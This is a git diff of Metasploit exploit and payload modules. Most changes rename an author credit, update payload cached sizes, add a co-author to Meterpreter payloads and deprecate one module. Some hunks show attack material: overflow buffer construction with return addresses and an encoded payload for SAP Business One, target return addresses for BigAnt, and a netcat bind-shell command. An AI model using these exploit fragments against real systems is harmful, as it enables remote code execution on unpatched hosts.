a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez. }, - 'Author' => [ 'patrick', 'riaf ' ], + 'Author' => [ 'aushack', 'riaf ' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 9d7d4f04f9..7a08aeab65 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -47,8 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & patrickw) p/p/r VBAJET32.dll xpsp3 & w2k - [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (patrickw 20090918) + [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & aushack) p/p/r VBAJET32.dll xpsp3 & w2k + [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (aushack 20090918) [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], # Should Work ], 'DefaultTarget' => 0, diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 57b83c5aef..4c99de4196 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index 0d01d60312..2244acfbef 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using "c:\>nc -L -p 31337 -e ftp". }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 9499a77bd6..48a5aec361 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # patrickw tested OK w2k3sp2 20090910 + # aushack tested OK w2k3sp2 20090910 [ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret ], 'Privileged' => true, @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024) sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024) - sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028) + sploit << [target.ret].pack('V') # EIP for w2k3sp0 - aushack (1028) sploit << make_nops(44) + payload.encoded + make_nops(384) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 0071bd5bfc..6f46ad6c69 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 56024b8e49..b497df5113 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index b338f9bff0..76bc660f62 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'KF ', # Original Metasploit module - 'patrick', # Some clean up - I'm sure there's more to be done :) + 'aushack', # Some clean up - I'm sure there's more to be done :) ], 'References' => [ diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 046f18ba69..9fe9b5c6a9 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 1ab28acb44..de686297fb 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original module - 'patrick', # msf3 port :) + 'aushack', # msf3 port :) ], 'References' => [ diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 9bdd4bbdbc..59d6666f17 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote Other versions may also be affected. The service terminates after exploitation, so you only get one chance! }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 0df62ca875..b9a3802d91 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ ['CVE', '2006-6184'], diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 4208af5357..e69459cecd 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'LSO ', # Exploit module - 'patrick', # Refs, stability, targets etc + 'aushack', # Refs, stability, targets etc ], 'References' => [ diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 749b7163d6..ee103390fe 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2006-4948' ], diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 1ceec34c73..824291023b 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads! }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 6622bbfef4..4b20b17172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 3239 + CachedSize = 3231 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index ecbb099b96..a0cfd2f733 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via Perl)', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', - 'Author' => ['Samy ', 'cazz', 'patrick'], + 'Author' => ['Samy ', 'cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index c7a9a583b6..20e475eb1c 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP (via perl) IPv6', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', - 'Author' => ['Samy ', 'cazz', 'patrick'], + 'Author' => ['Samy ', 'cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b677a24fef..83e3bc0f93 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 2eb30f8fdd..48bcf2a81d 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp_ssl' module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 400d828bc1..accb73877a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Windows Command, Double Reverse TCP Connection (via Perl)', 'Description' => 'Creates an interactive shell via perl', - 'Author' => ['cazz', 'patrick'], + 'Author' => ['cazz', 'aushack'], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 4fa8c97d53..d87445f832 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 7359 + CachedSize = 7544 include Msf::Payload::Single include Msf::Payload::Java diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 25b4b456e2..74c9255f11 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 7f493ef8e9..b1c6ffcd4e 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 4c1b96f0db..d6818b4eb2 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 4fff3cf0a5..f44197a497 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index d1e889a621..6341bee2ae 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 7ac0601213..634b6560ef 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 5da3516adf..cf5d0c6be7 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 976d22b3d0..ed339b08b0 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 866d3a0e5c..50080e27d1 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 8e5a81046a..5d755982a8 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 01618c62b5..d38aa97904 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 65778b0f92..ea96d086d2 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index ee78530672..8ab191d710 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 05b53aa7ba..b3aa33d864 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index bc38d4a374..fce512c439 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 92ad4f9c77..35b4a3ada0 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 27e5989778..e92e5319f3 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 66cdd82b24..ab9bbd211b 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 7c3d17f612..684af558e5 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 2edd9d4421..92fad1845a 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git 